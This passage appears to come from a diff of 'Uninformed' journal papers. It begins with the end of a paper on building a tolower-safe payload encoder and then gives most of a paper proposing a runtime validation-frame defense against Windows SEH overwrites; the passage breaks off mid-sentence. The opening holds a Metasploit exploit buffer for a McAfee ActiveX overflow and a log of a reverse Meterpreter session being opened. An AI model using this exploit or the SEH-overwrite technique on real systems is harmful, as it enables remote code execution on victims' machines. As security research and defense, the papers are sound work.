The purpose of this series of instructions is to cause the value of esp at the
|
||||
time that the pusha occurs to be popped into the ecx register. As the reader
|
||||
should recall, the ecx register is used as the base address for the decoder
|
||||
stub. However, since esp doesn't actually point to the base address of the
|
||||
decoder stub, the encoder must be informed that 8 extra bytes must be added to
|
||||
ecx when accounting for the extra offset into the encoded data blocks. This is
|
||||
conveyed by setting the BufferOffset value to 8. After these five instructions
|
||||
should come the encoded version of the payload. To better visualize this,
|
||||
consider the following snippet from the exploit:
|
||||
|
||||
|
||||
buf =
|
||||
Rex::Text.rand_text(2972, payload_badchars) +
|
||||
[ ret ].pack('V') +
|
||||
"\x60" + # pusha
|
||||
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
||||
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
||||
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
||||
"\x61" + # popa
|
||||
p.encoded
|
||||
|
||||
|
||||
With the overflow buffer ready to go, the only thing left to do is fire off the
|
||||
an exploit attempt by having the machine browse to the malicious website:
|
||||
|
||||
|
||||
msf exploit(mcafee_mcsubmgr_vsprintf) > exploit
|
||||
[*] Started reverse handler
|
||||
[*] Using URL: http://x.x.x.3:8080/foo
|
||||
[*] Server started.
|
||||
[*] Exploit running as background job.
|
||||
msf exploit(mcafee_mcsubmgr_vsprintf) >
|
||||
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
|
||||
[*] Sending stage (2834 bytes)
|
||||
[*] Sleeping before handling stage...
|
||||
[*] Uploading DLL (73739 bytes)...
|
||||
[*] Upload completed.
|
||||
[*] Meterpreter session 1 opened (x.x.x.3:4444 -> x.x.x.105:2010)
|
||||
|
||||
msf exploit(mcafee_mcsubmgr_vsprintf) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter >
|
||||
|
||||
|
||||
6) Conclusion
|
||||
|
||||
The purpose of this paper was to illustrate the process of implementing a
|
||||
customer encoder for the x86 architecture. In particular, the encoder
|
||||
described in this paper was designed to make it possible to encode payloads in
|
||||
a UTF-8 and tolower safe format. To help illustrate the usefulness of such an
|
||||
encoder, a recent vulnerability in the McAfee Subscription Manager ActiveX
|
||||
control was used because of its restrictions on uppercase characters. While
|
||||
many readers may never find it necessary to implement an encoder, it's
|
||||
nevertheless a necessary topic to understand for those who are interested in
|
||||
exploitation research.
|
||||
|
||||
|
||||
A. References
|
||||
|
||||
eEye. McAfee Subscription Manager Stack Buffer Overflow.
|
||||
http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html;
|
||||
accessed Aug 26, 2006.
|
||||
|
||||
|
||||
Metasploit Staff. Metasploit 3.0 Developer's Guide.
|
||||
http://www.metasploit.com/projects/Framework/msf3/developers_guide.pdf;
|
||||
accessed Aug 26, 2006.
|
||||
|
||||
|
||||
Spoonm. Recent Shellcode Developments.
|
||||
http://www.metasploit.com/confs/recon2005/recent_shellcode_developments-recon05.pdf;
|
||||
accessed Aug 26, 2006.
|
||||
|
||||
|
||||
SkyLined. Alpha 2.
|
||||
http://www.edup.tudelft.nl/ bjwever/documentation_alpha2.html.php;
|
||||
accessed Aug 26, 2006.
|
||||
|
||||
|
||||
|
||||
|
782
uninformed/5.2.txt
Normal file
782
uninformed/5.2.txt
Normal file
|
@ -0,0 +1,782 @@
|
|||
Preventing the Exploitation of SEH Overwrites
|
||||
9/2006
|
||||
skape
|
||||
mmiller@hick.org
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: This paper proposes a technique that can be used to prevent
|
||||
the exploitation of SEH overwrites on 32-bit Windows applications
|
||||
without requiring any recompilation. While Microsoft has attempted to
|
||||
address this attack vector through changes to the exception dispatcher
|
||||
and through enhanced compiler support, such as with /SAFESEH and /GS,
|
||||
the majority of benefits they offer are limited to image files that have
|
||||
been compiled to make use of the compiler enhancements. This limitation
|
||||
means that without all image files being compiled with these
|
||||
enhancements, it may still be possible to leverage an SEH overwrite to
|
||||
gain code execution. In particular, many third-party applications are
|
||||
still vulnerable to SEH overwrites even on the latest versions of
|
||||
Windows because they have not been recompiled to incorporate these
|
||||
enhancements. To that point, the technique described in this paper does
|
||||
not rely on any compile time support and instead can be applied at
|
||||
runtime to existing applications without any noticeable performance
|
||||
degradation. This technique is also backward compatible with all
|
||||
versions of Windows NT+, thus making it a viable and proactive solution
|
||||
for legacy installations.
|
||||
|
||||
Thanks: The author would like to thank all of the people who have helped
|
||||
with offering feedback and ideas on this technique. In particular, the
|
||||
author would like to thank spoonm, H D Moore, Skywing, Richard Johnson,
|
||||
and Alexander Sotirov.
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
Like other operating systems, the Windows operating system finds itself
|
||||
vulnerable to the same classes of vulnerabilities that affect other
|
||||
platforms, such as stack-based buffer overflows and heap-based buffer
|
||||
overflows. Where the platforms differ is in terms of how these
|
||||
vulnerabilities can be leveraged to gain code execution. In the case of
|
||||
a conventional stack-based buffer overflow, the overwriting of the
|
||||
return address is the most obvious and universal approach. However,
|
||||
unlike other platforms, the Windows platform has a unique vector that
|
||||
can, in many cases, be used to gain code execution through a stack-based
|
||||
overflow that is more reliable than overwriting the return address.
|
||||
This vector is known as a Structured Exception Handler (SEH) overwrite.
|
||||
This attack vector was publicly discussed for the first time, as far as
|
||||
the author is aware, by David Litchfield in his paper entitled Defeating
|
||||
the Stack Based Buffer Overflow Prevention Mechanism of Microsoft
|
||||
Windows 2003 Server However, exploits had been using this technique
|
||||
prior to the publication, so it is unclear who originally found the
|
||||
technique.
|
||||
|
||||
In order to completely understand how to go about protecting against SEH
|
||||
overwrites, it's prudent to first spend some time describing the
|
||||
intention of the facility itself and how it can be abused to gain code
|
||||
execution. To provide this background information, a description of
|
||||
structured exception handling will be given in section 2.1. Section 2.2
|
||||
provides an illustration of how an SEH overwrite can be used to gain
|
||||
code execution. If the reader already understands how structured
|
||||
exception handling works and can be exploited, feel free to skip ahead.
|
||||
The design of the technique that is the focus of this paper will be
|
||||
described in chapter 3 followed by a description of a proof of concept
|
||||
implementation in chapter 4. Finally, potential compatibility issues are
|
||||
noted in chapter 5.
|
||||
|
||||
|
||||
2.1) Structured Exception Handling
|
||||
|
||||
|
||||
Structured Exception Handling (SEH) is a uninform system for dispatching
|
||||
and handling exceptions that occur during the normal course of a
|
||||
program's execution. This system is similar in spirit to the way that
|
||||
UNIX derivatives use signals to dispatch and handle exceptions, such as
|
||||
through SIGPIPE and SIGSEGV. SEH, however, is a more generalized and
|
||||
powerful system for accomplishing this task, in the author's opinion.
|
||||
Microsoft's integration of SEH spans both user-mode and kernel-mode and
|
||||
is a licensed implementation of what is described in a patent owned by
|
||||
Borland. In fact, this patent is one of the reasons why open source
|
||||
operating systems have not chosen to integrate this style of exception
|
||||
dispatching.
|
||||
|
||||
In terms of implementation, structured exception handling works by
|
||||
defining a uniform way of handling all exceptions that occur during the
|
||||
normal course of process execution. In this context, an exception is
|
||||
defined as an event that occurs during execution that necessitates some
|
||||
form of extended handling. There are two primary types of exceptions.
|
||||
The first type, known as a hardware exception, is used to categorize
|
||||
exceptions that originate from hardware. For example, when a program
|
||||
makes reference to an invalid memory address, the processor will raise
|
||||
an exception through an interrupt that gives the operating system an
|
||||
opportunity to handle the error. Other examples of hardware exceptions
|
||||
include illegal instructions, alignment faults, and other
|
||||
architecture-specific issues. The second type of exception is known as
|
||||
a software exception. A software exception, as one might expect,
|
||||
originates from software rather than from the hardware. For example, in
|
||||
the event that a process attempts to close an invalid handle, the
|
||||
operating system may generate an exception.
|
||||
|
||||
One of the reasons that the word structured is included in structured
|
||||
exception handling is because of the fact that it is used to dispatch
|
||||
both hardware and software exceptions. This generalization makes it
|
||||
possible for applications to handle all types of exceptions using a
|
||||
common system, thus allowing for greater application flexibility when it
|
||||
comes to error handling.
|
||||
|
||||
The most important detail of SEH, insofar as it pertains to this
|
||||
document, is the mechanism through which applications can dynamically
|
||||
register handlers to be called when various types of exceptions occur.
|
||||
The act of registering an exception handler is most easily described as
|
||||
inserting a function pointer into a chain of function pointers that are
|
||||
called whenever an exception occurs. Each exception handler in the
|
||||
chain is given the opportunity to either handle the exception or pass it
|
||||
on to the next exception handler.
|
||||
|
||||
At a higher level, the majority of compiler-generated C/C++ functions
|
||||
will register exception handlers in their prologue and remove them in
|
||||
their epilogue. In this way, the exception handler chain mirrors the
|
||||
structure of a thread's stack in that they are both LIFOs
|
||||
(last-in-first-out). The exception handler that was registered last
|
||||
will be the first to be removed from the chain, much the same as last
|
||||
function to be called will be the first to be returned from.
|
||||
|
||||
To understand how the process of registering an exception handler
|
||||
actually works in practice, it makes sense to analyze code that makes
|
||||
use of exception handling. For instance, the code below illustrates what
|
||||
would be required to catch all exceptions and then display the type of
|
||||
exception that occurred:
|
||||
|
||||
|
||||
__try
|
||||
{
|
||||
...
|
||||
} __except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
printf("Exception code: %.8x\n", GetExceptionCode());
|
||||
}
|
||||
|
||||
In the event that an exception occurs from code inside of the try / except
|
||||
block, the printf call will be issued and GetExceptionCode will return the
|
||||
actual exception that occurred. For instance, if code made reference to an
|
||||
invalid memory address, the exception code would be 0xc0000005, or
|
||||
EXCEPTION_ACCESS_VIOLATION. To completely understand how this works, it is
|
||||
necessary to dive deeper and take a look at the assembly that is generated from
|
||||
the C code described above. When disassembled, the code looks something like
|
||||
what is shown below:
|
||||
|
||||
|
||||
00401000 55 push ebp
|
||||
00401001 8bec mov ebp,esp
|
||||
00401003 6aff push 0xff
|
||||
00401005 6818714000 push 0x407118
|
||||
0040100a 68a4114000 push 0x4011a4
|
||||
0040100f 64a100000000 mov eax,fs:[00000000]
|
||||
00401015 50 push eax
|
||||
00401016 64892500000000 mov fs:[00000000],esp
|
||||
0040101d 83c4f4 add esp,0xfffffff4
|
||||
00401020 53 push ebx
|
||||
00401021 56 push esi
|
||||
00401022 57 push edi
|
||||
00401023 8965e8 mov [ebp-0x18],esp
|
||||
00401026 c745fc00000000 mov dword ptr [ebp-0x4],0x0
|
||||
0040102d c6050000000001 mov byte ptr [00000000],0x1
|
||||
00401034 c745fcffffffff mov dword ptr [ebp-0x4],0xffffffff
|
||||
0040103b eb2b jmp ex!main+0x68 (00401068)
|
||||
0040103d 8b45ec mov eax,[ebp-0x14]
|
||||
00401040 8b08 mov ecx,[eax]
|
||||
00401042 8b11 mov edx,[ecx]
|
||||
00401044 8955e4 mov [ebp-0x1c],edx
|
||||
00401047 b801000000 mov eax,0x1
|
||||
0040104c c3 ret
|
||||
|
||||
0040104d 8b65e8 mov esp,[ebp-0x18]
|
||||
00401050 8b45e4 mov eax,[ebp-0x1c]
|
||||
00401053 50 push eax
|
||||
00401054 6830804000 push 0x408030
|
||||
00401059 e81b000000 call ex!printf (00401079)
|
||||
0040105e 83c408 add esp,0x8
|
||||
00401061 c745fcffffffff mov dword ptr [ebp-0x4],0xffffffff
|
||||
00401068 8b4df0 mov ecx,[ebp-0x10]
|
||||
0040106b 64890d00000000 mov fs:[00000000],ecx
|
||||
00401072 5f pop edi
|
||||
00401073 5e pop esi
|
||||
00401074 5b pop ebx
|
||||
00401075 8be5 mov esp,ebp
|
||||
00401077 5d pop ebp
|
||||
00401078 c3 ret
|
||||
|
||||
|
||||
The actual registration of the exception handler all occurs behind the scenes
|
||||
in the C code. However, in the assembly code, the registration of the
|
||||
exception handler starts at 0x0040100a and spans four instructions. It is
|
||||
these four instructions that are responsible for registering the exception
|
||||
handler for the calling thread. The way that this actually works is by
|
||||
chaining an EXCEPTION_REGISTRATION_RECORD to the front of the list of exception
|
||||
handlers. The head of the list of already registered exception handlers is
|
||||
found in the ExceptionList attribute of the NT_TIB structure. If no exception
|
||||
handlers are registered, this value will be set to 0xffffffff. The NT_TIB
|
||||
structure makes up the first part of the TEB, or Thread Environment Block,
|
||||
which is an undocumented structure used internally by Windows to keep track of
|
||||
per-thread state in user-mode. A thread's TEB can be accessed in a
|
||||
position-independent fashion by referencing addresses relative to the fs
|
||||
segment register. For example, the head of the exception list chain be be
|
||||
obtained through fs:[0].
|
||||
|
||||
To make sense of the four assembly instructions that register the custom
|
||||
exception handler, each of the four instructions will be described
|
||||
individually. For reference purposes, the layout of the
|
||||
EXCEPTION_REGISTRATION_RECORD is described below:
|
||||
|
||||
|
||||
+0x000 Next : Ptr32 _EXCEPTION_REGISTRATION_RECORD
|
||||
+0x004 Handler : Ptr32
|
||||
|
||||
|
||||
1. push 0x4011a4
|
||||
|
||||
The first instruction pushes the address of the CRT generated excepthandler3
|
||||
symbol. This routine is responsible for dispatching general exceptions that
|
||||
are registered through the except compiler intrinsic. The key thing to note
|
||||
here is that the virtual address of a function is pushed onto the stack that is
|
||||
excepted to be referenced in the event that an exception is thrown. This push
|
||||
operation is the first step in dynamically constructing an
|
||||
EXCEPTION_REGISTRATION_RECORD on the stack by first setting the Handler
|
||||
attribute.
|
||||
|
||||
2. mov eax,fs:[00000000]
|
||||
|
||||
The second instruction takes the current pointer to the first
|
||||
EXCEPTION_REGISTRATION_RECORD and stores it in eax.
|
||||
|
||||
3. push eax
|
||||
|
||||
The third instruction takes the pointer to the first exception registration
|
||||
record in the exception list and pushes it onto the stack. This, in turn, sets
|
||||
the Next attribute of the record that is being dynamically generated on the
|
||||
stack. Once this instruction completes, a populated
|
||||
EXCEPTION_REGISTRATION_RECORD will exist on the stack that takes the following
|
||||
form:
|
||||
|
||||
|
||||
+0x000 Next : 0x0012ffb0
|
||||
+0x004 Handler : 0x004011a4 ex!_except_handler3+0
|
||||
|
||||
|
||||
4. mov fs:[00000000],esp
|
||||
|
||||
Finally, the dynamically generated exception registration record is stored as
|
||||
the first exception registration record in the list for the current thread.
|
||||
This completes the process of inserting a new registration record into the
|
||||
chain of exception handlers.
|
||||
|
||||
|
||||
The important things to take away from this description of exception handler
|
||||
registration are as follows. First, the registration of exception handlers is
|
||||
a runtime operation. This means that whenever a function is entered that makes
|
||||
use of an exception handler, it must dynamically register the exception
|
||||
handler. This has implications as it relates to performance overhead. Second,
|
||||
the list of registered exception handlers is stored on a per-thread basis.
|
||||
This makes sense because threads are considered isolated units of execution and
|
||||
therefore exception handlers are only relative to a particular thread. The
|
||||
final, and perhaps most important, thing to take away from this is that the
|
||||
assembly generated by the compiler to register an exception handler at runtime
|
||||
makes use of the current thread's stack. This fact will be revisited later in
|
||||
this section.
|
||||
|
||||
In the event that an exception occurs during the course of normal execution,
|
||||
the operating system will step in and take the necessary steps to dispatch the
|
||||
exception. In the event that the exception occurred in the context of a thread
|
||||
that is running in user-mode, the kernel will take the exception information
|
||||
and generate an EXCEPTION_RECORD that is used to encapsulate all of the
|
||||
exception information. Furthermore, a snapshot of the executing state of the
|
||||
thread is created in the form of a populated CONTEXT structure. The kernel
|
||||
then passes this information off to the user-mode thread by transferring
|
||||
execution from the location that the fault occurred at to the address of
|
||||
ntdll!KiUserExceptionDispatcher. The important thing to understand about this
|
||||
is that execution of the exception dispatcher occurs in the context of the
|
||||
thread that generated the exception.
|
||||
|
||||
The job of ntdll!KiUserExceptionDispatcher is, as the name implies, to dispatch
|
||||
user-mode exceptions. As one might guess, the way that it goes about doing
|
||||
this is by walking the chain of registered exception handlers stored relative
|
||||
to the current thread. As the exception dispatcher walks the chain, it calls the
|
||||
handler associated with each registration record, giving that handler the
|
||||
opportunity to handle, fail, or pass on the exception.
|
||||
|
||||
|
||||
While there are other things involved in the exception dispatching process,
|
||||
this description will suffice to set the stage for how it might be abused to
|
||||
gain code execution.
|
||||
|
||||
|
||||
2.2) Gaining Code Execution
|
||||
|
||||
There is one important thing to remember when it comes to trying to gain code
|
||||
execution through an SEH overwrite. Put simply, the fact that each exception
|
||||
registration record is stored on the stack lends itself well to abuse when
|
||||
considered in conjunction with a conventional stack-based buffer overflow. As
|
||||
described in section , each exception registration record is composed of a Next
|
||||
pointer and a Handler function pointer. Of most interest in terms of
|
||||
exploitation is the Handler attribute. Since the exception dispatcher makes use
|
||||
of this attribute as a function pointer, it makes sense that should this
|
||||
attribute be overwritten with attacker controlled data, it would be possible to
|
||||
gain code execution. In fact, that's exactly what happens, but with an added
|
||||
catch.
|
||||
|
||||
While typical stack-based buffer overflows work by overwriting the return
|
||||
address, an SEH overwrite works by overwriting the Handler attribute of an
|
||||
exception registration record that has been stored on the stack. Unlike
|
||||
overwriting the return address, where control is gained immediately upon return
|
||||
from the function, an SEH overwrite does not actually gain code execution until
|
||||
after an exception has been generated. The exception is necessary in order to
|
||||
cause the exception dispatcher to call the overwritten Handler.
|
||||
|
||||
While this may seem like something of a nuisance that would make SEH overwrites
|
||||
harder to exploit, it's not. Generating an exception that leads to the calling
|
||||
of the Handler is as simple as overwriting the return address with an invalid
|
||||
address in most cases. When the function returns, it attempts to execute code
|
||||
from an invalid memory address which generates an access violation exception.
|
||||
This exception is then passed onto the exception dispatcher which calls the
|
||||
overwritten Handler.
|
||||
|
||||
The obvious question to ask at this point is what benefit SEH overwrites have
|
||||
over the conventional practice of overwriting the return address. To
|
||||
understand this, it's important to consider one of the common practices
|
||||
employed in Windows-based exploits. On Windows, thread stack addresses tend to
|
||||
change quite frequently between operating system revisions and even across
|
||||
process instances. This differs from most UNIX derivatives where stack
|
||||
addresses are typically predictable across multiple operating system revisions.
|
||||
Due to this fact, most Windows-based exploits will indirectly transfer control
|
||||
into the thread's stack by first bouncing off an instruction that exists
|
||||
somewhere in the address space. This instruction must typically reside at an
|
||||
address that is less prone to change, such as within the code section of a
|
||||
binary. The purpose of this instruction is to transfer control back to the
|
||||
stack in a position-independent fashion. For example, a jmp esp instruction
|
||||
might be used. While this approach works perfectly fine, it's limited by
|
||||
whether or not an instruction can be located that is both portable and reliable
|
||||
in terms of the address that it resides at. This is where the benefits of SEH
|
||||
overwrites begin to become clear.
|
||||
|
||||
When simply overwriting the return address, an attacker is often limited to a
|
||||
small set of instructions that are not typically common to find at a reliable
|
||||
and portable location in the address space. On the other hand, SEH overwrites
|
||||
have the advantage of being able to use another set of instructions that are
|
||||
far more prevalent in the address space of most every process. This set of
|
||||
instructions is commonly referred to as pop/pop/ret. The reason this class of
|
||||
instructions can be used with SEH overwrites and not general stack overflows
|
||||
has to do with the method in which exception handlers are called by the
|
||||
exception dispatcher. To understand this, it is first necessary to know what
|
||||
the specific prototype is for the Handler field in the
|
||||
EXCEPTION_REGISTRATION_RECORD structure:
|
||||
|
||||
|
||||
typedef EXCEPTION_DISPOSITION (*ExceptionHandler)(
|
||||
IN EXCEPTION_RECORD ExceptionRecord,
|
||||
IN PVOID EstablisherFrame,
|
||||
IN PCONTEXT ContextRecord,
|
||||
IN PVOID DispatcherContext);
|
||||
|
||||
|
||||
The field of most importance is the EstablisherFrame. This field actually
|
||||
points to the address of the exception registration record that was pushed onto
|
||||
the stack. It is also located at [esp+8] when the Handler is called.
|
||||
Therefore, if the Handler is overwritten with the address of a pop/pop/ret
|
||||
sequence, the result will be that the execution path of the current thread will
|
||||
be transferred to the address of the Next attribute for the current exception
|
||||
registration record. While this field would normally hold the address of the
|
||||
next registration record, it instead can hold four bytes of arbitrary code that
|
||||
an attacker can supply when triggering the SEH overwrite. Since there are only
|
||||
four contiguous bytes of memory to work with before hitting the Handler field,
|
||||
most attackers will use a simple short jump sequence to jump past the handler
|
||||
and into the attacker controlled code that comes after it.
|
||||
|
||||
|
||||
3) Design
|
||||
|
||||
The one basic requirement of any solution attempting to prevent the leveraging
|
||||
of SEH overwrites is that it must not be possible for an attacker to be able to
|
||||
supply a value for the Handler attribute of an exception registration record
|
||||
that is subsequently used in an unchecked fashion by the exception dispatcher
|
||||
when an exception occurs. If a solution can claim to have satisfied this
|
||||
requirement, then it should be true that the solution is secure.
|
||||
|
||||
To that point, Microsoft's solution is secure, but only if all of the images
|
||||
loaded in the address space have been compiled with /SAFESEH. Even then, it's
|
||||
possible that it may not be completely secure For example, it should be
|
||||
possible to overwrite the Handler with the address of some non-image associated
|
||||
executable region, if one can be found. If there are any images that have not
|
||||
been compiled with /SAFESEH, it may be possible for an attacker to overwrite
|
||||
the Handler with an address of an instruction that resides within an
|
||||
unprotected image. The reason Microsoft's implementation cannot protect
|
||||
against this is because SafeSEH works by having the exception dispatcher
|
||||
validate handlers against a table of image-specific safe exception handlers
|
||||
prior to calling an exception handler. Safe exception handlers are stored in a
|
||||
table that is contained in any executable compiled with /SAFESEH. Given this
|
||||
limitation, it can also be said that Microsoft's implementation is not secure
|
||||
given the appropriate conditions. In fact, for third-party applications, and
|
||||
even some Microsoft-provided applications, these conditions are considered by
|
||||
the author to be the norm rather than the exception. In the end, it all boils
|
||||
down to the fact that Microsoft's solution is a compile-time solution rather
|
||||
than a runtime solution. With these limitations in mind, it makes sense to
|
||||
attempt to approach the problem from the angle of a runtime solution rather
|
||||
than a compile-time solution.
|
||||
|
||||
When it comes to designing a runtime solution, the important consideration that
|
||||
has to be made is that it will be necessary to intercept exceptions before they
|
||||
are passed off to the registered exception handlers by the exception
|
||||
dispatcher. The particulars of how this can be accomplished will be discussed
|
||||
in chapter . Assuming a solution is found to the layering problem, the next
|
||||
step is to come up with a solution for determining whether or not an exception
|
||||
handler is valid and has not been tampered with. While there are many
|
||||
inefficient solutions to this problem, such as coming up with a solution to
|
||||
keep a ``secure'' list of registered exception handlers, there is one solution
|
||||
in particular that the author feels is bested suited for the problem.
|
||||
|
||||
One of the side effects of an SEH overwrite is that the attacker will typically
|
||||
clobber the value of the Next attribute associated with the exception
|
||||
registration record that is overwritten. This occurs because the Next
|
||||
attribute precedes the Handler attribute in memory, and therefore must be
|
||||
overwritten before the Handler in the case of a typical buffer overflow. This
|
||||
has a very important side effect that is the key to facilitating the
|
||||
implementation of a runtime solution. In particular, the clobbering of the
|
||||
Next attribute means that all subsequent exception registration records would
|
||||
not be reachable by the exception dispatcher when walking the chain.
|
||||
|
||||
Consider for the moment a solution that, during thread startup, places a custom
|
||||
exception registration record as the very last exception registration record in
|
||||
the chain. This exception registration record will be symbolically referred to
|
||||
as the validation frame henceforth. From that point forward, whenever an
|
||||
exception is about to be dispatched, the solution could walk the chain prior to
|
||||
allowing the exception dispatcher to handle the exception. The purpose of
|
||||
walking the chain before hand is to ensure that the validation frame can be
|
||||
reached. As such, the validation frame's purpose is similar to that of stack
|
||||
canaries. If the validation frame can be reached, then that is evidence of the
|
||||
fact that the chain of exception handlers has not been corrupted. As described
|
||||
above, the act of overwriting the Handler attribute also requires that the Next
|
||||
pointer be overwritten. If the Next pointer is not overwritten with an address
|
||||
that ensures the integrity of the exception handler chain, then this solution
|
||||
can immediately detect that the integrity of the chain is in question and
|
||||
prevent the exception dispatcher from calling the overwritten Handler.
|
||||
|
||||
Using this technique, the act of ensuring that the integrity of the exception
|
||||
handler chain is kept intact results in the ability to prevent SEH overwrites.
|
||||
The important questions to ask at this point center around what limitations
|
||||
this solution might have. The most obvious question to ask is what's to stop
|
||||
an attacker from simply overwriting the Next pointer with the value that was
|
||||
already there. There are a few things that stop this. First of all, it will
|
||||
be common that the attacker does not know the value of the Next pointer.
|
||||
Second, and perhaps most important, is that one of the benefits of using an SEH
|
||||
overwrite is that an attacker can make use of a pop/pop/ret sequence. By
|
||||
forcing an attacker to retain the value of the Next pointer, the major benefit
|
||||
of using an SEH overwrite in the first place is gone. Even conceding this
|
||||
point, an attacker who is able to retain the value of the Next pointer would
|
||||
find themselves limited to overwriting the Handler with the address of
|
||||
instructions that indirectly transfer control back to their code. However, the
|
||||
attacker won't simply be able to use an instruction like jmp esp because the
|
||||
Handler will be called in the context of the exception dispatcher. It's at
|
||||
this point that diminishing returns are reached and an attacker is better off
|
||||
simply overwriting the return address, if possible.
|
||||
|
||||
Another important question to ask is what's to stop the attacker from
|
||||
overwriting the Next pointer with the address of the validation frame itself
|
||||
or, more easily, with 0xffffffff. The answer to this is much the same as
|
||||
described in the above paragraph. Specifically, by forcing an attacker away
|
||||
from the pop/pop/ret sequence, the usefulness of the SEH overwrite vector
|
||||
quickly degrades to the point of it being better to simply overwrite the return
|
||||
address, if possible. However, in order to be sure, the author feels that
|
||||
implementations of this solution would be wise to randomize the location of the
|
||||
validation frame.
|
||||
|
||||
It is the author's opinion that the solution described above satisfies the
|
||||
requirement outlined in the beginning of this chapter and therefore qualifies
|
||||
as a secure solution. However, there's always a chance that something has been
|
||||
missed. For that reason, the author is more than happy to be proven wrong on
|
||||
this point.
|
||||
|
||||
|
||||
4) Implementation
|
||||
|
||||
The implementation of the solution described in the previous chapter relies on
|
||||
intercepting exceptions prior to allowing the native exception dispatcher to
|
||||
handle them such that the exception handler chain can be validated. First and
|
||||
foremost, it is important to identify a way of layering prior to the point that
|
||||
the exception dispatcher transfers control to the registered exception
|
||||
handlers. There are a few different places that this layering could occur at,
|
||||
but the one that is best suited to catch the majority of user-mode exceptions
|
||||
is at the location that ntdll!KiUserExceptionDispatcher gains control.
|
||||
However, by hooking ntdll!KiUserExceptionDispatcher, it is possible that this
|
||||
implementation may not be able to intercept all cases of an exception being
|
||||
raised, thus making it potentially feasible to bypass the exception handler
|
||||
chain validation.
|
||||
|
||||
The best location would be to layer at would be ntdll!RtlDispatchException. The
|
||||
reason for this is that exceptions raised through ntdll!RtlRaiseException, such
|
||||
as software exceptions, may be passed directly to ntdll!RtlDispatchException
|
||||
rather than going through ntdll!KiUserExceptionDispatcher first. The condition
|
||||
that controls this is whether or not a debugger is attached to the user-mode
|
||||
process when ntdll!RtlRaiseException is called. The reason
|
||||
ntdll!RtlDispatchException is not hooked in this implementation is because it
|
||||
is not directly exported. There are, however, fairly reliable techniques that
|
||||
could be used to determine its address. As far as the author is aware, the act
|
||||
of hooking ntdll!KiUserExceptionDispatcher should mean that it's only possible
|
||||
to miss software exceptions which are much harder, and in most cases
|
||||
impossible, for an attacker to generate.
|
||||
|
||||
In order to layer at ntdll!KiUserExceptionDispatcher, the first few
|
||||
instructions of its prologue can be overwritten with an indirect jump to a
|
||||
function that will be responsible for performing any sanity checks necessary.
|
||||
Once the function has completed its sanity checks, it can transfer control back
|
||||
to the original exception dispatcher by executing the overwritten instructions
|
||||
and then jumping back into ntdll!KiUserExceptionDispatcher at the offset of the
|
||||
next instruction to be executed. This is a nice and ``clean'' way of
|
||||
accomplishing this and the performance overhead is miniscule Where ``clean'' is
|
||||
defined as the best it can get from a third-party perspective.
|
||||
|
||||
In order to hook ntdll!KiUserExceptionDispatcher, the first n instructions,
|
||||
where n is the number of instructions that it takes to cover at least 6 bytes,
|
||||
must be copied to a location that will be used by the hook to execute the
|
||||
actual ntdll!KiUserExceptionDispatcher. Following that, the first n
|
||||
instructions of ntdll!KiUserExceptionDispatcher can then be overwritten with an
|
||||
indirect jump. This indirect jump will be used to transfer control to the
|
||||
function that will validate the exception handler chain prior to allowing the
|
||||
original exception dispatcher to handle the exception.
|
||||
|
||||
With the hook installed, the next step is to implement the function that will
|
||||
actually validate the exception handler chain. The basic steps involved in
|
||||
this are to first extract the head of the list from fs:[0] and then iterate
|
||||
over each entry in the list. For each entry, the function should validate that
|
||||
the Next attribute points to a valid memory location. If it does not, then the
|
||||
chain can be assumed to be corrupt. However, if it does point to valid memory,
|
||||
then the routine should check to see if the Next pointer is equal to the
|
||||
address of the validation frame that was previously stored at the end of the
|
||||
exception handler chain for this thread. If it is equal to the validation
|
||||
frame, then the integrity of the chain is confirmed and the exception can be
|
||||
passed to the actual exception dispatcher.
|
||||
|
||||
However, if the function reaches an invalid Next pointer, or it reaches
|
||||
0xffffffff without encountering the validation frame, then it can assume that
|
||||
the exception handler chain is corrupt. It's at this point that the function
|
||||
can take whatever steps are necessary to discard the exception, log that a
|
||||
potential exploitation attempt occurred, and so on. The end result should be
|
||||
the termination of either the thread or the process, depending on
|
||||
circumstances. This algorithm is captured by the pseudo-code below:
|
||||
|
||||
|
||||
01: CurrentRecord = fs:[0];
|
||||
02: ChainCorrupt = TRUE;
|
||||
03: while (CurrentRecord != 0xffffffff) {
|
||||
04: if (IsInvalidAddress(CurrentRecord->Next))
|
||||
05: break;
|
||||
06: if (CurrentRecord->Next == ValidationFrame) {
|
||||
07: ChainCorrupt = FALSE;
|
||||
08: break;
|
||||
09: }
|
||||
10: CurrentRecord = CurrentRecord->Next;
|
||||
11: }
|
||||
12: if (ChainCorrupt == TRUE)
|
||||
13: ReportExploitationAttempt();
|
||||
14: else
|
||||
15: CallOriginalKiUserExceptionDispatcher();
|
||||
|
||||
|
||||
The above algorithm describes how the exception dispatching path should be
|
||||
handled. However, there is one important part remaining in order to implement
|
||||
this solution. Specifically, there must be some way of registering the
|
||||
validation frame with a thread prior to any exceptions being dispatched on that
|
||||
thread. There are a few ways that this can be accomplished. In terms of a
|
||||
proof of concept, the easiest way of doing this is to implement a DLL that,
|
||||
when loaded into a process' address space, catches the creation notification of
|
||||
new threads through a mechanism like DllMain or through the use of a TLS
|
||||
callback in the case of a statically linked library. Both of these approaches
|
||||
provide a location for the solution to establish the validation frame with the
|
||||
thread early on in its execution. However, if there were ever a case where the
|
||||
thread were to raise an exception prior to one of these routines being called,
|
||||
then the solution would improperly detect that the exception handler chain was
|
||||
corrupt.
|
||||
|
||||
One solution to this potential problem is to store state relative to each
|
||||
thread that keeps track of whether or not the validation frame has been
|
||||
registered. There are certain implications about doing this, however. First,
|
||||
it could introduce a security problem in that an attacker might be able to
|
||||
bypass the protection by somehow toggling the flag that tracks whether or not
|
||||
the validation frame has been registered. If this flag were to be toggled to
|
||||
no and an exception were generated in the thread, then the solution would have
|
||||
to assume that it can't validate the chain because no validation frame has been
|
||||
installed. Another issue with this is that it would require some location to
|
||||
store this state on a per-thread basis. A good example of a place to store
|
||||
this is in TLS, but again, it has the security implications described above.
|
||||
|
||||
A more invasive solution to the problem of registering the validation frame
|
||||
